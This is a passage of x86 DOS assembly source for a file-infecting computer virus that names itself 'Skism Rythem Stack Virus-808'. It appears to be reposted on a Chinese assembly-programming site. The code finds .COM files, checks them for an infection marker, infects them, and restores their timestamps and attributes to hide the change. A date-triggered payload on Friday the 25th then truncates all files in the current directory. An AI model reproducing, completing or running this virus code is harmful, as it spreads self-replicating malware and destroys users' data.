int 21h ;
mov [diskdtaseg],es ;save old segment
mov [diskdtaofs],bx ;save old offset
mov dx,offset filedata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h ;
逆风编程技术
scandir:
mov cx,07h ;find any attribute
mov dx,offset filespec ;point dx to "*.COM",0
mov ah,4eh ;find first file function
int 21h ;
cmp ax,12h ;was file found?
jne transform
nextexe:
mov ah,4fh ;find next file
int 21h ;
cmp ax,12h ;none found
jne transform ;found see what we can do
mov dx,offset rootdir ;move dx to change to root directory
mov ah,3bh ;change directory to root
int 21h ;
mov ah,1ah ;set dta address
mov ds,[diskdtaseg] ;restore old segment
mov dx,[diskdtaofs] ;restore old offset
int 21h ;
jmp dirloop
bus:
jmp rollout
transform:
mov ah,2fh ;temporally store dta
int 21h ;
mov [tempseg],es ;save old segment
mov [tempofs],bx ;save old offset
mov dx, offset filedata filename
mov bx,offset filedata ;save file...
mov ax,[bx] filedate ;date
mov orig_date,ax ;
mov ax,[bx] filetime ;time
mov orig_time,ax ; and
mov ax,[bx] fileattr ;
mov ax,4300h
int 21h
mov orig_attr,cx
mov ax,4301h ;change attributes
xor cx,cx ;clear attributes
int 21h ;
mov ax,3d00h ;open file - read
int 21h ;
jc fixup ;error - find another file
mov handle,ax ;save handle
mov ah,3fh ;read from file
mov bx,handle ;move handle to bx
mov cx,02h ;read 2 bytes
mov dx,offset idbuffer ;save to buffer
int 21h ;
mov ah,3eh ;close file for now
mov bx,handle ;load bx with handle
int 21h ;
mov bx, idbuffer ;fill bx with id string
cmp bx,02ebh ;infected?
jne doit ;same - find another file
fixup:
mov ah,1ah ;set dta address
mov ds,[tempseg] ;restore old segment
mov dx,[tempofs] ;restore old offset
int 21h ;
jmp nextexe
doit:
mov dx, offset filedata filename
mov ax,3d02h ;open file read/write ACCESS
int 21h ;
mov handle,ax ;save handle
call infectfile
;mov ax,3eh ;close file
;int 21h
rollout:
mov ax,5701h ;restore original
mov bx,handle ;
mov cx,orig_time ;time and
mov dx,orig_date ;date
int 21h ;
mov ax,4301h ;restore original attributes
mov cx,orig_attr
mov dx,offset filedata filename
int 21h
;mov bx,handle
;mov ax,3eh ;close file
;int 21h
mov ah,3bh ;try to fix this
mov dx,offset rootdir ;for speed
int 21h ;
mov ah,3bh ;change directory
mov dx,offset currentdir ;back to original
int 21h ;
mov ah,2ah ;check system date
int 21h ;
cmp cx,1991 ;is it at least 1991?
jb audi ;no? don't do it now
cmp dl,25 ;is it the 25th?
jb audi ;not yet? quit
cmp al,5 ;is Friday?
jne audi ;no? quit
mov dx,offset dirdata ;offset of where to hold new dta
mov ah,1ah ;set dta address
int 21h ;
mov ah,4eh ;find first file
mov cx,7h ;
mov dx,offset filespec2 ;offset *.*
Loops:
int 21h ;
jc audi ;error? then quit
mov ax,4301h ;find all normal files
xor cx,cx ;
int 21h ;
mov dx,offset dirdata filename
mov ah,3ch ;fuck up all files in current dir
int 21h ;
jc audi ;error? quit
mov ah,4fh ;find next file
jmp loops ;
audi:
mov ax,4c00h ;end program
int 21h ;
;The below is just text to pad out the virus size to 808 bytes. Don't
;just change the text and claim that this is your creation.
words_ db "Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods",0
本文章更多内容:<<上一页 - 1 - 2 - 3 - 下一页>> |
您的位置:逆风者
→ 汇编技术
→ 正文
本文章所属分类:首页
→ 汇编技术